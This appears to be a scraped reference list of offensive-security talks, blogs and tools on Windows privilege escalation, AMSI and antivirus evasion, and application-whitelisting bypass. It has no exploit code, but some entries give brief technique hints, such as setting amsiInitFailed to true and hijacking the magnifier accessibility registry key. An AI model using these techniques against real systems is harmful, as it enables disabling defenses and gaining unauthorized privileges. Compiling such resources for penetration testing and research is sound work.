- One successful technique in social engineering is pretending to be someone or something you're not and hoping the security guard who's forgotten their reading glasses doesn't look too closely at your fake ID. Of course there's no hyperopic guard in the Windows OS, but we do have an ID card, the Access Token which proves our identity to the system and let's us access secured resources. The Windows kernel provides simple capabilities to identify fake Access Tokens, but sometimes the kernel or other kernel-mode drivers are too busy to use them correctly. If a fake token isn't spotted during a privileged operation local elevation of privilege or information disclosure vulnerabilities can be the result. This could allow an attacker to break out of an application sandbox, elevate to administrator privileges, or even compromise the kernel itself. This presentation is about finding and then exploiting the incorrect handling of tokens in the Windows kernel as well as first and third party drivers. Examples of serious vulnerabilities, such as CVE-2015-0002 and CVE-2015-0062 will be presented. It will provide clear exploitable patterns so that you can do your own security reviews for these issues. Finally, I'll discuss some of the ways of exploiting these types of vulnerabilities to elevate local privileges.
-
Social Engineering The Windows Kernel: Finding And Exploiting Token Handling Vulnerabilities - James Forshaw - BHUSA2015
-
Tools
-
Tokenvator
- A tool to alter privilege with Windows Tokens
-
token_manipulation
- Bypass User Account Control by manipulating tokens (can bypass AlwaysNotify)
-
Tokenvator
-
Potatoes
- Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM - @breenmachine
- Rotten Potato Privilege Escalation from Service Accounts to SYSTEM - Stephen Breen Chris Mallz - Derbycon6
-
RottenPotatoNG
- New version of RottenPotato as a C++ DLL and standalone C++ binary - no need for meterpreter or other tools.
- The lonely potato - decoder.cloud(2017)
-
No more rotten/juicy potato? - decoder.cloud(2018)
- Rotten potato inadvertently patched on Win10 1809
- Potatoes and tokens - decoder.cloud(2018)
- Juicy Potato (abusing the golden privileges) - Andrea Pierini, Giuseppe Trotta(2018)
-
Articles/Blogposts/Writeups
-
PentestLab Windows PrivEsc Writeup List
- Secondary Logon Handle
- Insecure Registry Permissions
- Intel SYSRET
- Weak Service Permissions Obtaining System Privileges
- The “SYSTEM” challenge
- Writeup of achieving system from limited user privs.
- [All roads lead to SYSTEM]
https://labs.mwrinfosecurity.com/system/assets/760/original/Windows_Services_-_All_roads_lead_to_SYSTEM.pdf
- Alternative methods of becoming SYSTEM - Adam Chester(2017)
- admin to SYSTEM win7 with remote.exe - carnal0wnage
- Getting a CMD prompt as SYSTEM in Windows Vista and Windows Server 2008 - blogs.technet
-
Another way to get to a system shell – Assistive Technology -oddvar.moe
-
Manipulate HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\magnifier
– StartExe to run other binary when pressing WinKey and plus to zoom. -
Can load binary from Webdav and also start webbrowser and browse to desired link
-
Runs command as system during UAC prompt and logon screen
-
-
Talks/Videos
- Hacking windows through the Windows API; delves into windows api, how it can break itself
- Sedating the Watchdog Abusing Security Products to Bypass Windows Protections - Tomer Bit - BSidesSF
- Black hat talk on Windows Privilege Escalation
- Level Up! - Practical Windows Privilege Escalation
-
Extreme Privelege Escalataion on Windows8 UEFI Systems
- Slides
- Summary by stormehh from reddit: “In this whitepaper (and accompanying Defcon/Blackhat presentations), the authors demonstrate vulnerabilities in the UEFI "Runtime Service" interface accessible by a privileged userland process on Windows 8. This paper steps through the exploitation process in great detail and demonstrates the ability to obtain code execution in SMM and maintain persistence by means of overwriting SPI flash”
- The Travelling Pentester: Diaries of the Shortest Path to Compromise
- Windows Privilege Escalation - Riyaz Walikar
-
Privilege Escalation FTW - MalwareJake(WWHF2018)
- Often you don't land in a penetration test with full admin rights. How can you fix that? In most networks it's easier than you might think. In this session, Jake will discuss and demonstrate various privilege escalation techniques that are possible primarily due to misconfigurations. Practically every network has one or more misconfigurations that let you easily escalate from random Joe to total pro. We'll examine some common issues present in both Windows and Linux to you can level up for your next penetration test.
- Abusing privileged file operations on Windows - Clement Lavoillotte(Troopers19)
-
Tools
-
Windows Exploit Suggester
- [Blogpost]https://blog.gdssecurity.com/labs/2014/7/11/introducing-windows-exploit-suggester.html
- This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.
-
PowerUp
- Windows Privilege Escalation through Powershell
-
ElevateKit
- The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.
-
BeRoot
- BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.
-
Pompem
- Pompem is an open source tool, designed to automate the search for Exploits and Vulnerability in the most important databases. Developed in Python, has a system of advanced search, that help the work of pentesters and ethical hackers. In the current version, it performs searches in PacketStorm security, CXSecurity, ZeroDay, Vulners, National Vulnerability Database, WPScan Vulnerability Database
-
AccessChk
- As a part of ensuring that they've created a secure environment Windows administrators often need to know what kind of accesses specific users or groups have to resources including files, directories, Registry keys, global objects and Windows services. AccessChk quickly answers these questions with an intuitive interface and output.
- AutoDane at BSides Cape Town
-
Auto DANE
- Auto DANE attempts to automate the process of exploiting, pivoting and escalating privileges on windows domains.
-
lonelypotato
- Modified version of RottenPotatoNG C++
- Blogpost
-
psgetsystem
- getsystem via parent process using ps1 & embeded c#
-
Sherlock
- PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.
-
Robber
- Robber is open source tool for finding executables prone to DLL hijacking
- WinPrivCheck.bat
-
JAWS - Just Another Windows (Enum) Script
- JAWS is PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written using PowerShell 2.0 so 'should' run on every Windows version since Windows 7.
-
Windows Exploit Suggester - Next Generation (WES-NG)
- WES-NG is a tool based on the output of Windows' systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported.
-
Powerless
- "A Windows privilege escalation (enumeration) script designed with OSCP labs (i.e. legacy Windows machines without Powershell) in mind. The script represents a conglomeration of various privilege escalation checks, gathered from various sources, all done via native Windows binaries present in almost every version of Windows." - It's a batch file
-
Windows Exploit Suggester
-
Writeups
-
To-be-sorted
-
Analyzing local privilege escalations in win32k
- This paper analyzes three vulnerabilities that were found in win32k.sys that allow kernel-mode code execution. The win32k.sys driver is a major component of the GUI subsystem in the Windows operating system. These vulnerabilities have been reported by the author and patched in MS08-025. The first vulnerability is a kernel pool overflow with an old communication mechanism called the Dynamic Data Exchange (DDE) protocol. The second vulnerability involves improper use of the ProbeForWrite function within string management functions. The third vulnerability concerns how win32k handles system menu functions. Their discovery and exploitation are covered.
-
Windows-Privilege-Escalation - frizb
- Windows Privilege Escalation Techniques and Scripts
- Some forum posts on Win Priv Esc
- Post Exploitation Using netNTLM Downgrade attacks - Fishnet/Archive.org
- Old Privilege Escalation Techniques
- Windows 7 ‘Startup Repair’ Authentication Bypass
-
Windows Privilege Escalation Guide - sploitspren(2018)
- Nice methodology/walk through of Windows PrivEsc methods and tactics
- Windows Privilege Escalation Methods for Pentesters - pentest.blog
- Linux Vulnerabilities Windows Exploits: Escalating Privileges with WSL - BlueHat IL 2018 - Saar Amar
- CVE-2018-0952: Privilege Escalation Vulnerability in Windows Standard Collector Service - Ryan Hanson
- Windows 10 Privilege Escalation using Fodhelper - hackercool
- Local privilege escalation via the Windows I/O Manager: a variant finding collaboration - swiat
- Abusing SeLoadDriverPrivilege for privilege escalation - Oscar Mallo
- Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege - James Forshaw
-
CVE-2020-0668 - A Trivial Privilege Escalation Bug in Windows Service Tracing - itm4n
- "In this post, I’ll discuss an arbitrary file move vulnerability I found in Windows Service Tracing. From my testing, it affected all versions of Windows from Vista to 10 but it’s probably even older because this feature was already present in XP."
- Issue 1554: Windows: Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix EoP - Project0
- Waves Maxx Audio DLL Side-Loading LPE via Windows Registry - Robert Hawes
-
Analyzing local privilege escalations in win32k
-
ALPC
- Original
-
zeroday-powershell
- A PowerShell example of the Windows zero day priv esc
-
Anti-Virus Software
- #AVGater: Getting Local Admin by Abusing the Anti-Virus Quarantine
- CVE-2018-8955: Bitdefender GravityZone Arbitrary Code Execution - Kyriakos Economou
- COModo: From Sandbox to SYSTEM (CVE-2019–3969) - David Wells
- Reading Physical Memory using Carbon Black's Endpoint driver - Bill Demirkapi
- SEPM-EoP
- Exploiting STOPzilla AntiMalware Arbitrary Write Vulnerability using SeCreateTokenPrivilege - Parvez
- Analysis and Exploitation of an ESET Vulnerability - Tavid Ormandy(2015)
-
Compromised by Endpoint Protection - codewhitesec.blogspot
- Symantec Endpoint Protection vulns
- Escalating Privileges with CylancePROTECT - Ryan Hanson
- Avira Optimizer Local Privilege Escalation - Enigma0x3
-
Other
- One more Steam Windows Client Local Privilege Escalation 0day - Vasily Kravets
-
Local Privilege Escalation on Dell machines running Windows - Bill Demirkapi
- This blog post will cover my research into a Local Privilege Escalation vulnerability in Dell SupportAssist. Dell SupportAssist is advertised to “proactively check the health of your system’s hardware and software”. Unfortunately, Dell SupportAsssist comes pre-installed on most of all new Dell machines running Windows. If you’re on Windows, never heard of this software, and have a Dell machine - chances are you have it installed.
-
CVE-2019-9730: LPE in Synaptics Sound Device Driver - @Jackon_T
- CVE details for a COM-based local privilege elevation with a brief write-up on discovery to root.
- Technical Advisory: Intel Driver Support & Assistance – Local Privilege Escalation - NCCGroup
- Elastic Boundaries – Elevating Privileges by Environment Variables Expansion - Yoam Gottesman
- DisplayLink USB Graphics Software arbitrary file write Elevation of Privilege - Yannick Méheut(2020)
-
To-be-sorted
-
Exploits
-
CVE-2017-8759
- Exploit toolkit CVE-2017-8759 - v1.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft .NET Framework RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.
-
Win10-LPE
- The Windows 10 LPE exploit written by SandboxEscaper. This includes the source code for the original exploit, a precompiled DLL injector binary included with the original source, and a powershell script to find potentially vulnerable libraries to overwrite for the exploit.
- Component Services Volatile Environment LPE - bytecode77
-
CVE-2018-0952-SystemCollector
- PoC for Privilege Escalation in Windows 10 Diagnostics Hub Standard Collector Service
- CVE-2018-8420
- CVE-2018-8440 - PowerShell PoC
-
Remote Code Execution — Gaining Domain Admin due to a typo: CVE-2018-9022 - Daniel C
- A short time ago as part of a red team engagement I found and successfully exploited a remote code execution vulnerability that resulted in us quickly gaining high privilege access to the customers internal network. So far nothing sounds too out of the ordinary, however interestingly the root cause of this vulnerability was due to a two character typo.
- Another Local Privilege Escalation Vulnerability Using Process Creation Impersonation - Wayne Chin Yick Low
- XIGNCODE3 xhunter1.sys LPE - x86.re
- Display Languages Volatile Environment LPE - bytecode77
- Performance Monitor Volatile Environment LPE
- Enter Product Key Volatile Environment LPE
- Sysprep Volatile Environment LPE(2017)
- Remote Assistance Volatile Environment LPE
- Display Languages Volatile Environment LPE
- CVE-2017-12478 - Unitrends 9.x api_storage exploit
-
CVE-2020-0668
- Use CVE-2020-0668 to perform an arbitrary privileged file move operation.
-
CVE-2019-8372: Local Privilege Elevation in LG Kernel Driver - Jackson_T
- TL;DR: CVE for driver-based LPE with an in-depth tutorial on discovery to root and details on two new tools.
-
CVE-2020-0787 - Windows BITS - An EoP Bug Hidden in an Undocumented RPC Function - itm4n
- This post is about an arbitrary file move vulnerability I found in the Background Intelligent Transfer Service. This is yet another example of a privileged file operation abuse in Windows 10. There is nothing really new but the bug itself is quite interesting because it was hidden in an undocumented function. Therefore, I will explain how I found it and I will also share some insights about the reverse engineering process I went through in order to identify the logic flaw.
- [CVE49] Microsoft Windows LNK Remote Code Execution Vulnerability - CVE-2020-1299 - linhlhq from Infiniti Team - VinCSS
-
CVE-2017-8759
-
Just-Enough-Administration(JEA)
-
Get $pwnd: Attacking Battle Hardened Windows Server - Lee Holmes - Defcon25
- Windows Server has introduced major advances in remote management hardening in recent years through PowerShell Just Enough Administration ("JEA"). When set up correctly, hardened JEA endpoints can provide a formidable barrier for attackers: whitelisted commands, with no administrative access to the underlying operating system. In this presentation, watch as we show how to systematically destroy these hardened endpoints by exploiting insecure coding practices and administrative complexity.
-
Get $pwnd: Attacking Battle Hardened Windows Server - Lee Holmes - Defcon25
-
Microsoft
- From Hyper-V Admin to SYSTEM - decoder.cloud
-
Windows Credential Theft: RDP & Internet Explorer 11
- NTLM Hashes/relay through RDP files/IE11 XXE explained
-
MSSQL
-
PowerUpSQL - 2018 Blackhat USA Arsenal
- This is the presentation we provided at the 2018 Blackhat USA Arsenal to introduce PowerUpSQL. PowerUpSQL includes functions that support SQL Server discovery, weak configuration auditing, privilege escalation on scale, and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However, PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server. This should be interesting to red, blue, and purple teams interested in automating day to day tasks involving SQL Server.
-
PowerUpSQL - 2018 Blackhat USA Arsenal
-
VirtualMachines
-
InviZzzible
- InviZzzible is a tool for assessment of your virtual environments in an easy and reliable way. It contains the most recent and up to date detection and evasion techniques as well as fixes for them. Also, you can add and expand existing techniques yourself even without modifying the source code.
-
InviZzzible
-
VMWare
-
VMware Escape Exploit
- VMware Escape Exploit before VMware WorkStation 12.5.5
- A bunch of Red Pills: VMware Escapes - Marco Grassi, Azureyang, Jackyxty
-
VMware Exploitation
- A bunch of links related to VMware escape exploits
-
VMware Escape Exploit
-
101
-
Defense Evasion
-
101
- String Replacement & Obfuscation
- Runtime modification(Polymorphism)
- Sandbox detection & Avoidance
- Log Avoidance & Deletion
-
Articles/Blogposts/Writeups
-
Quiet in the Windows: Dropping Network Connections - Eviatar Gerzi
-
DropNet
- A tool that can be used to close network connections automatically with a given parameters
-
DropNet
- Evade the analyst - Forensics|Exchange(2019)
-
Quiet in the Windows: Dropping Network Connections - Eviatar Gerzi
-
Talks/Presentations/Videos
-
Noob 101: Practical Techniques for AV Bypass - Jared Hoffman - ANYCON 2017
- The shortcomings of anti-virus (AV) solutions have been well known for some time. Nevertheless, both public and private organizations continue to rely on AV software as a critical component of their information security programs, acting as a key protection mechanism over endpoints and other information systems within their networks. As a result, the security posture of these organizations is significantly jeopardized by relying only on this weakened control.
-
Evading Autoruns - Kyle Hanslovan, Chris Bisnett(DerbyCon7)
- When it comes to offense, maintaining access to your endpoints is key. For defenders, it's equally important to discover these footholds within your network. During this talk, Kyle and Chris expose several semi-public and private techniques used to evade the most common persistence enumeration tools. Their techniques will explore ways to re-invent the run key, unconventionally abuse search order, and exploit trusted applications. To complement their technical explanations, each bypass includes a live demo and recommendations for detection.
- RE: Evading Autoruns PoCs on Windows 10 - Kyle Hanslovan
- Evading Autoruns - DerbyCon 7.0
-
Antivirus Evasion: Lessons Learned – thelightcosine(Derbycon2013)
- Over the past year, the speaker has spent alot of time talking with people in the infoSec Community and doing research on antivirus evasion techniques. Learning what works and what doesn't. There are a lot of good ideas floating around out there. In this talk we're going to pull those ideas all together. We'll discuss the basics of the AV evasion problem, what techniques work, which ones don't and why. The talk will have a particular focus on AV evasion as it relates to Metasploit payloads.
-
Antivirus Evasion through Antigenic Variation (Why the Blacklisting Approach to AV is Broken) - Trenton Ivey, Neal Bridges(Derbycon2013)
- Description: Think of the last time you got sick. Your immune system is an amazing piece of machinery, but every now and then, something gets past it. Antivirus evasion techniques can become more effective when modeled after infectious diseases. This talk highlights many of the antivirus evasion techniques in use today. Going further, this talk shows how genetic algorithms can quickly and repeatedly “evolve” code to evade many malicious code detection techniques in use today.
-
Bypassing Antivirus: With Understanding Comes Ease - Jeff McJunkin(WWHF Deadwood2020)
- The job of a penetration tester is to emulate real-world, realistic adversaries to compromise the client and explain the business risks of the technical findings. Those pesky real-world adversaries bypass AV all the time, even with essentially the same malware, over and over. How do they do it? Simple. By understanding what traps AV is setting, you can step around, jump over, or disable those traps before sauntering to your destination unhindered. I can't help with your saunter, but I can help you understand and bypass AV using arbitrary payloads (whether Cobalt Strike, Metasploit, Covenant, Mystic, SILENTTRINITY, or whichever) in many ways, all in less than an hour.
- The Art of bypassing endpoint protections for red teaming engagements - Eslam Reda, Jameel Nabbo(2020)
-
Evading Detection A Beginner's Guide to Obfuscation - BC-Security(2021)
- Have you wanted to learn some more advanced Windows evasion techniques? Here is your chance to learn from the experts. This 2-hour long webinar will cover the basics of Windows Defenses such as Event and Script Block Logging, Anti-Malware Scan Interface (AMSI), and Windows Defender. Next, we will demonstrate obfuscations and evasion techniques that Advanced Persistent Threats (APTs) employ to evade modern defenses.
-
Noob 101: Practical Techniques for AV Bypass - Jared Hoffman - ANYCON 2017
-
AMSI
-
101
- Remember kids, it's not a security boundary according to MS. Just like UAC, and AppLocker. Just something they threw in there for funsies. Totally not about security. Nope. No way. Nuh uh. Never in a million years. (Just a little salty after reading some official documentation saying so)
- Antimalware Scan Interface (AMSI) - docs.ms
- Developer audience, and sample code - docs.ms
- Antimalware Scan Interface (AMSI) functions - docs.ms
-
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It - Nikhil Mittal(BHUS16)
- Blogpost
- Paper
- In Windows 10, Microsoft introduced the AntiMalware Scan Interface (AMSI) which is designed to target script-based attacks and malware. Script-based attacks have been lethal for enterprise security and with advent of PowerShell, such attacks have become increasingly common. AMSI targets malicious scripts written in PowerShell, VBScript, JScript etc. and drastically improves detection and blocking rate of malicious scripts. When a piece of code is submitted for execution to the scripting host, AMSI steps in and the code is scanned for malicious content. What makes AMSI effective is, no matter how obfuscated the code is, it needs to be presented to the script host in clear text and unobfuscated. Moreover, since the code is submitted to AMSI just before execution, it doesn't matter if the code came from disk, memory or was entered interactively. AMSI is an open interface and MS says any application will be able to call its APIs. Currently, Windows Defender uses it on Windows 10. Has Microsoft finally killed script-based attacks? What are the ways out? The talk will be full of live demonstrations.
- Announcing the .NET Framework 4.8 - devblogs.ms
-
whoamsi
- The purpose of this page is to be a repository of endpoint protection (AV, EDR, etc) that uses Microsoft's Antimalware Scan Interface (AMSI). This will provide some context around endpoint protection and possible attack vectors. Products with information missing have not been verified yet. This project expands on the work done by @Lee_Holmes and @PyroTek3 by keeping a publicly available list up-to-date.
-
AMSI Internals
- The Rise and Fall of AMSI - Tal Liberman(BHAsia 2018)
-
IAmsiStream interface sample - MS Github
- Demonstrates how to use the Antimalware Scan Interface to scan a stream.
- Antimalware Scan Interface (AMSI) functions - docs.ms
-
AMSI Bypass - Paul Laine(2019)
- This blog post explains the inner workings of AMSI, and describes a new bypass technique.(related to AmsiScanBuffer)
- AMSI Module Remote In-Memory Patch - Paul Laine(2020)
-
MS Office file format sorcery - Stan Hegt, Pieter Ceelen(Troopers19)
- Slides
- A deep dive into file formats used in MS Office and how we can leverage these for offensive purposes. We will show how to fully weaponize ‘p-code’ across all MS Office versions in order to create malicious documents without using VBA code, successfully bypassing antivirus and other defensive measures. In this talk Stan and Pieter will do a deep dive into the file formats used in MS Office, demonstrating many features that can be used offensively. They will present attacks that apply to both the legacy formats (OLE streams) and the newer XML based documents. Specific focus is around the internal representation of VBA macros and pseudo code (p-code, execodes) and how these can be weaponized. We will detail the inner logic of Word and Excel regarding VBA and p-code, and release scripts and tools for creating malicious Office documents that bypass anti-virus, YARA rules, AMSI for VBA and various MS Office document analyzers.
-
Bypasses
-
Compilations
-
Amsi-Bypass-PowerShell - S3cur3Th1sSh1t
- List of Bypasses
- Antimalware Scan Interface (AMSI) — A Red Team Analysis on Evasion - iwantmore.pizza
- Exploring PowerShell AMSI and Logging Evasion - Adam Chester(2018)
-
Adventures in the Wonderful World of AMSI. - byte_st0rm(2019)
- Overview + Rather then use “LoadLibrary” and “GetProcAddress” to locate the memory addresses of “amsi.dll” and “amsiScanBuffer”, walk the “PEB” of the process and the export directory of “amsi.dll”.
- How Red Teams Bypass AMSI and WLDP for .NET Dynamic Code - modexp(2019)
- AMSI - Resurrecting the Dead - Crawl3r(2020)
-
Amsi-Bypass-PowerShell - S3cur3Th1sSh1t
-
General Stuff
- How to bypass AMSI and execute ANY malicious Powershell code - zc00l
- Weaponizing AMSI bypass with PowerShell - @0xB455(2019)
-
AMSI.fail
- C# Azure Function with an HTTP trigger that generates obfuscated PowerShell snippets that break or disable AMSI for the current process. The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures.
-
AMSI.fail4
- Converted AMSI.fail to a .NET Framework 4 solution so that it can be called from PowerShell 5.
- Bypassing AV (Windows Defender) … the tedious way. - CB Hue(2019)
- Use PSv2
- Obfuscation
-
DLL Hijack
- Bypassing Amsi using PowerShell 5 DLL Hijacking - cn33liz(2016)
- Disabling AMSI in JScript with One Simple Trick - James Forshaw(2018)
-
Resurrecting an old AMSI Bypass - Philippe Vogler(2020)
- Before the latest Windows Defender update, and possibly with other endpoint security products, regardless of access rights on a host, users can bypass AMSI for PowerShell. Other scripting engines such as jscript or cscript do not suffer from this DLL hijack and directly load AMSI from the System32 folder.
-
COM Server Hijack
-
Bypassing AMSI via COM Server Hijacking - Enigma0x3
- This post will highlight a way to bypass AMSI by hijacking the AMSI COM server, analyze how Microsoft fixed it in build #16232 and then how to bypass that fix. This issue was reported to Microsoft on May 3rd, and has been fixed as a Defense in Depth patch in build #16232.
-
Bypassing AMSI via COM Server Hijacking - Enigma0x3
- Null Character
-
Registry Key
- [The Rise and Fall of AMSI - Tal Liberman(BH Asia18)]https://i.blackhat.com/briefings/asia/2018/asia-18-Tal-Liberman-Documenting-the-Undocumented-The-Rise-and-Fall-of-AMSI.pdf)
- Patching AmsiScanString
-
Patching AmsiScanBuffer
- RastaMouse AmsiScanBuffer Bypass Series(2018)
- How to bypass AMSI and execute ANY malicious Powershell code - zc00l(2018)
- AMSI Bypass Redux - Avi Gimpel(2018)
- Alternative AMSI bypass - Benoit Sevens(2018)
- Yet another update to bypass AMSI in VBA - Khris Tolbert(2019)
- Hunting for AMSI bypasses - Wee-Jing Chung(2019)
- Execute any "evil" Powershell code by bypassing AMSI - Dec0ne(2019)
-
Understanding and Bypassing AMSI - Tom Carver(2020)
-
AmsiHook
- AmsiHook is a DLL that when injected to a process containing AMSI logging, will hook the AMSI functions and allow them to execute with dummy parameters.
-
AmsiHook
-
Tools
-
AmsiScanBufferBypass
- Circumvent AMSI by patching AmsiScanBuffer
-
AmsiScanBufferBypass
-
AmsiInitialize
- Patchless AMSI bypass using SharpBlock - Ceri Coburn(2020)
-
SharpBlock
- A method of bypassing EDR's active projection DLL's by preventing entry point execution.
- Forcing an Error
-
Manually set the
amsiInitFailed
field to$true
- Jscript9.dll
-
Heap-based
- How Red Teams Bypass AMSI and WLDP for .NET Dynamic Code - modexp(2019)
-
Heap-based AMSI bypass for MS Excel VBA and others - Dan@CodeWhite(2019)
- This blog post describes how to bypass Microsoft's AMSI (Antimalware Scan Interface) in Excel using VBA (Visual Basic for Applications). In contrast to other bypasses this approach does not use hardcoded offsets or opcodes but identifies crucial data on the heap and modifies it. The idea of an heap-based bypass has been mentioned by other researchers before but at the time of writing this article no public PoC was available. This blog post will provide the reader with some insights into the AMSI implementation and a generic way to bypass it.
-
CorruptCLRGlobal.ps1 - Matt Graeber
- A PoC function to corrupt the g_amsiContext global variable in clr.dll in .NET Framework Early Access build 3694
- AMSI in the HEAP x32 - secureyourit.co.uk(2020)
- ...
-
Hooking
-
Goodbye Obfuscation, Hello Invisi-Shell: Hiding Your Powershell Script in Plain Sight - Omer Yair(Derbycon2018)
- “The very concept of objective truth is fading out of the world. Lies will pass into history.” George Orwell. Objective truth is essential for security. Logs, notifications and saved data must reflect the actual events for security tools, forensic teams and IT managers to perform their job correctly. Powershell is a prime example of the constant cat and mouse game hackers and security personnel play every day to either reveal or hide the “objective truth” of a running script. Powershell’s auto logging, obfuscation techniques, AMSI and more are all participants of the same game playing by the same rules. We don’t like rules, so we broke them. As a result, Babel-Shellfish and Invisi-Shelltwo new tools that both expose and disguise powershell scripts were born. Babel-Shellfish reveals the inner hidden code of any obfuscated script while Invisi-Shell offers a new method of hiding malicious scripts, even from the Powershell process running it. Join us as we present a new way to think about scripts.
- Invisi-Shell
- Understanding and Bypassing AMSI - Tom Carver(2020)
-
Goodbye Obfuscation, Hello Invisi-Shell: Hiding Your Powershell Script in Plain Sight - Omer Yair(Derbycon2018)
-
Compilations
-
Bypass Talks
- AMSI: How Windows 10 Plans To Stop Script Based Attacks And How Well It Does It - Nikhil Mittal(BHUSA16)
-
Antimalware Scan Interface (AMSI) - Dave Kennedy(WWHF2018)
- This talk will dive into the Antimalware Scan Interface (AMSI) as well as other alternatives in the “NextGen” series of preventative measures and show how trivial it is to write code that doesn’t get snagged. The security market is focusing on open source data collection sources and security researchers as the main method to write signatures to detect attacks, much like what we saw in the 90s with traditional anti-virus tech. Not much has changed, let’s dive into the reality in security and how little these protective measures really do in the grand scheme of things. We’ll also be covering solid practices in defending against attacks, and what we should be focusing on.
- PSAmsi An offensive PowerShell module for interacting with the Anti Malware Scan Interface in Windows - Ryan Cobb(Derbycon7)
- Red Team TTPs Part 1: AMSI Evasion - paranoidninja
-
Bypass Tools
-
CorruptCLRGlobal.ps1
- A PoC function to corrupt the g_amsiContext global variable in clr.dll in .NET Framework Early Access build 3694 Raw
-
AMSI Bypass Code Snippet Examples
- "This repo contains some Amsi Bypass methods i found on different Blog Posts."
-
PSAmsi
- PSAmsi is a tool for auditing and defeating AMSI signatures. It's best utilized in a test environment to quickly create payloads you know will not be detected by a particular AntiMalware Provider, although it can be useful in certain situations outside of a test environment. When using outside of a test environment, be sure to understand how PSAmsi works, as it can generate AMSI alerts.
-
powershellveryless
- Constrained Language Mode + AMSI bypass all in one
-
AmsiBypass
- C# PoC implementation for bypassing AMSI via in memory patching
-
NoAmci
- A PoC for using DInvoke to patch AMSI.dll in order to bypass AMSI detections triggered when loading .NET tradecraft via Assembly.Load(). .Net tradecraft can be compressed, encoded (encrypted if required) in order to keep the assembly size less than 1MB, then embedded as a resource to be loaded after patching amsi.dll memory.
-
CorruptCLRGlobal.ps1
-
VBA Specific
- 101
-
Blogposts
- Dynamic Microsoft Office 365 AMSI In Memory Bypass Using VBA - Richard Davy, Gary Nield(2019)
- The Document that Eluded AppLocker and AMSI - ZLAB-YOROI
- Office 365 AMSI Bypass (fixed) - Iliya Dafchev(2019)
-
Bypassing AMSI for VBA - Pieter Ceelen
- This blog is a writeup of the various AMSI weaknesses presented at the Troopers talk ‘MS Office File Format Sorcery‘ and the Blackhat Asia presentation ‘Office in Wonderland’.
-
Adventures in the Wonderful World of AMSI. - byte_st0rm(2019)
- Overview + Rather then use “LoadLibrary” and “GetProcAddress” to locate the memory addresses of “amsi.dll” and “amsiScanBuffer”, walk the “PEB” of the process and the export directory of “amsi.dll”.
- AMSI in the HEAP x32 - secureyourit.co.uk(2020)
-
Instrumenting AMSI
-
Articles/Blogposts/Writeups
- AMSI as a Service — Automating AV Evasion - James(2019)
- Hunting for malicious strings using AmsiTrigger - RythmStick(2020)
-
AMSI Scanner
- A C/C++ implementation of Microsoft's Antimalware Scan Interface
-
amsi-tracer
- Leverage AMSI (Antimalware Scan Interface) technology to aid your analysis. This tool saves all buffers (scripts, .NET assemblies, etc) passed into AMSI during dynamic execution.
- Antimalware Scan Interface Detection Optics Analysis Methodology: Identification and Analysis of AMSI for WMI - Matt Graeber(2019)
-
Tools
- MalwareScan.AMSI
-
AMSITrigger v3
- The Hunt for Malicious Strings
-
Articles/Blogposts/Writeups
-
101
-
Anti-Virus
-
Code Runners
-
Execute ShellCode Using Python
- In this article I am going to show you, how can we use python and its "ctypes" library to execute a "calc.exe" shell code or any other shell code.
- Bypassing AV's like its 2001 - Flangvik(2020)
-
Execute ShellCode Using Python
-
Code Signing
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Tools
- File Templates
- History
- Obfuscation
-
Polymorphism
- See 'Polymorphism' under 'Specific Techniques'
- String Modification
-
Code Runners
-
Application Whitelisting
- 101
-
Articles/Blogposts/Writeups
- Escaping the Microsoft Office Sandbox: a faulty regex, allows malicious code to escape and persist - Adam Chester
- Microsoft Applications and Blocklist - FortyNorthSecurity
- Technical Advisory: Bypassing Workflows Protection Mechanisms - Remote Code Execution on SharePoint - Soroush Dalilil
- Bypassing Application Whitelisting with BGInfo - Oddvar Moe
- Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner - exploit-monday.com
- Bypass Application Whitelisting Script Protections - Regsvr32.exe & COM Scriptlets (.sct files)
- How to Evade Application Whitelisting Using REGSVR32 - Joff Thyer
- Bypassing Application Whitelisting with runscripthelper.exe - Matt Graeber
- Using Application Compatibility Shims - subTee
- Consider Application Whitelisting with Device Guard - subTee
- Bypassing Application Whitelisting using MSBuild.exe - Device Guard Example and Mitigations - subTee
- Setting Up A Homestead In the Enterprise with JavaScript - subTee
- Bypass Application Whitelisting Script Protections - Regsvr32.exe & COM Scriptlets (.sct files)
-
Application Whitelist Bypass Techniques
- A Catalog of Application Whitelisting Bypass Techniques - SubTee
- Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner
- BinariesThatDoesOtherStuff.txt - api0cradle
- VBA RunPE - Breaking Out of Highly Constrained Desktop Environments - Part 1/2 - itm4n
-
Talks & Presentations
-
Fantastic Red-Team Attacks and How to Find Them - Casey Smith, Ross Wolf(BHUSA 2019)
- This talk summarizes prevalent and ongoing gaps across organizations uncovered by testing their defenses against a broad spectrum of attacks via Atomic Red Team. Many of these adversary behaviors are not atomic, but span multiple events in an event stream that may be arbitrarily and inconsistently separated in time by nuisance events.
- Slides
- Blogpost
-
Fantastic Red-Team Attacks and How to Find Them - Casey Smith, Ross Wolf(BHUSA 2019)
- Talks
-
Tools
- MS Signed mimikatz in just 3 steps
-
GreatSCT
- The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.
-
